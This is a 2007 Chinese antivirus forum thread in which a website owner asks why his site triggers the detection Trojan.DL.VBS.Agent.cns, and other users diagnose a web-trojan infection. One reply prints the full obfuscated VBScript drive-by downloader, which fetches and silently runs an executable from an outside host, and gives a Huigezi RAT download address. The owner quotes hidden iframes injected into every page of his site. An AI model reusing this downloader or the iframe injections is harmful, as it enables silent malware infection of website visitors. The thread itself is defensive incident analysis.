瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 我中了新病毒 Trojan.DL.VBS.Agent.cns
【村长】 - 2007-5-11 9:35:00
发现新病毒Trojan.DL.VBS.Agent.cns


一打开我的网站http://www.sdxhyy.com/web/book/index.asp,瑞星网页监控 发现病毒 Trojan.DL.VBS.Agent.cns,我FTP以上网站的源代码到本地杀毒,用最新正版瑞星,却没发现病毒,怎么办?求高手帮忙!多谢!
飞尔斯06 - 2007-5-11 9:39:00
开了一下,是有.C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\304037762920.tmp,304037762920.tmp,xskj[1].jpg,是不是这个图有问题
飞尔斯06 - 2007-5-11 9:41:00
怀疑是java script代码问题.
【村长】 - 2007-5-11 9:47:00
到网上搜索也搜索不到相关解答,求高手帮忙了。。。
流星陨落 - 2007-5-11 9:47:00
此网站被挂毒,挂了几个网马和ANI漏洞利用下载者,病毒下载的文件,为灰鸽子病毒,另外找到几个未知下载物,已经上报给瑞星了,请在近期勿访问此网站
流星陨落 - 2007-5-11 9:49:00
灰鸽子下载地址

hxxp://remix2008.myrice.com/smdd.exe
流星陨落 - 2007-5-11 9:50:00
<script language="VBScript">
On Error Resume Next
QnxyX="http://www.66ki.cn/hua.exe"
Set RJURL = document.createElement("object")
ccc="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"
RJURL.SetAttribute "classid", ccc&lll&sss&iii&ddd
OOBnPl=xxx&mmm
Set MKHbx = RJURL.CreateObject(OOBnPl,"")
MKHbx.Open "GET", QnxyX, False
MKHbx.Send
MQWLa="~I7PRUGI1VAC.CoM"
SEiDu="~V5SFDYCLNTK.VbS"
XpTvd="~V5SFDYCLNTK.VbS"
SS="Scripting."
cc="FileSyst"
rr="emObject"
Set Kpzwb = RJURL.createobject(SS&cc&rr,"")
Set SrHOx = Kpzwb.GetSpecialFolder(2)
MQWLa=Kpzwb.BuildPath(SrHOx,MQWLa)
SEiDu=Kpzwb.BuildPath(SrHOx,SEiDu)
RR="Adod"
NN="b.stream"
UoNfL=RR&NN
Set HSREb = RJURL.createobject(UoNfL,"")
HSREb.type=1
HSREb.Open
HSREb.Write MKHbx.ResponseBody
HSREb.Savetofile MQWLa,2
HSREb.Close
HSREb.Type=2
HSREb.Open
HSREb.WriteText  "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"
HSREb.Savetofile SEiDu,2
HSREb.Savetofile "c:\\NTDETECT.EXE",2
HSREb.Close
WSjog="Shell.Applica"
Set Run = RJURL.createobject(WSjog&"tion","")
Run.ShellExecute SEiDu,"","","Open",0
</script></html><script type="text/jscript">function init() {document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
document.writeln("<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
document.writeln("<P>Additionally, a 404 Not Found");
document.writeln("error was encountered while trying to use an ErrorDocument to handle the request.");
document.writeln("<\/BODY>");}window.onload = init;
</script>




网马代码
流星陨落 - 2007-5-11 9:54:00
第一楼的仁兄,鉴定病毒要细心,此网马用VBScript写的,不是java script
【村长】 - 2007-5-11 9:54:00
那网站是我自己的呀,怎么挂上的病毒?
【村长】 - 2007-5-11 9:58:00
流星陨落,请开QQ帮我会诊一下,多谢
【村长】 - 2007-5-11 10:54:00
我看了一下,我网站上的每个文件都被加了这样一句代码:<iframe src=http://remix2008.myrice.com/gz.htm width=0 height=0></iframe><iframe src="http://www.hao123hao123.cn/ok/index.htm" width="0" height="0" frameborder="0"></iframe><iframe src="http://www.hao123hao123.cn/ok/index.htm" width="0" height="0" frameborder="0"></iframe><iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe><iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe><iframe src=http://www.66ki.cn/index.htm width=100 height=0></iframe>
是不是手工删除就行了??
【村长】 - 2007-5-11 13:42:00
人呢?
FFASD - 2007-5-18 12:38:00
我也中了,重新还原系统后,运行QQ进程,又中Trojan.DL.VBS.Agent.cns了,有没有彻底查杀的工具啊?
FFASD - 2007-5-18 12:42:00
该病毒还会引发rising.exe病毒
ken237 - 2007-5-27 18:32:00
请问各位高手,我的网站跟楼主一样中了木马.应该怎么清除呢?
病毒名称也是一样的!能加我QQ229090614告诉我吗?小弟万分感谢
hmg43 - 2007-7-2 11:07:00
看来瑞星现在杀不了这些病毒,至少也要给个警告,尽量降低损失,而不是视而不见吧?
1
查看完整版本: 我中了新病毒 Trojan.DL.VBS.Agent.cns
© 2000 - 2026 Rising Corp. Ltd.